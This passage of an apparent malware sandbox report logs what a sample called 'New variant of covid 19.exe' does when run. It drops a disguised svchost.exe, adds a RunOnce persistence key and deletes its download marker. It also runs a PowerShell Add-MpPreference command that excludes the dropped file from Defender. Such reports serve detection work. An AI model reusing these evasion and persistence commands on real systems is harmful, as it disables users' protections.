      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3ey4z3.avd.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: New variant of covid 19.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\New variant of covid 19.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\New variant of covid 19.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile read: C:\Users\user\Desktop\New variant of covid 19.exe:Zone.IdentifierJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\New variant of covid 19.exe 'C:\Users\user\Desktop\New variant of covid 19.exe'
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: unknownProcess created: C:\Users\user\Desktop\New variant of covid 19.exe C:\Users\user\Desktop\New variant of covid 19.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1956
      Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknownProcess created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknownProcess created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: unknownProcess created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess created: C:\Users\user\Desktop\New variant of covid 19.exe C:\Users\user\Desktop\New variant of covid 19.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: C:\Users\user\Desktop\New variant of covid 19.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: New variant of covid 19.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: New variant of covid 19.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

      Data Obfuscation:

      barindex
      Binary contains a suspicious time stampShow sources
      Source: initial sampleStatic PE information: 0xBB7292A1 [Tue Aug 27 16:53:53 2069 UTC]
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_06ADB379 push es; iretd
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_06ADB980 push es; ret
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeCode function: 39_2_0037992C push A9CB66CBh; retf

      Persistence and Installation Behavior:

      barindex
      Drops PE files with benign system namesShow sources
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeJump to dropped file
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeJump to dropped file
      Source: C:\Users\user\Desktop\New variant of covid 19.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenXJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenXJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenXJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenXJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile opened: C:\Users\user\Desktop\New variant of covid 19.exe:Zone.Identifier read attributes | delete
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
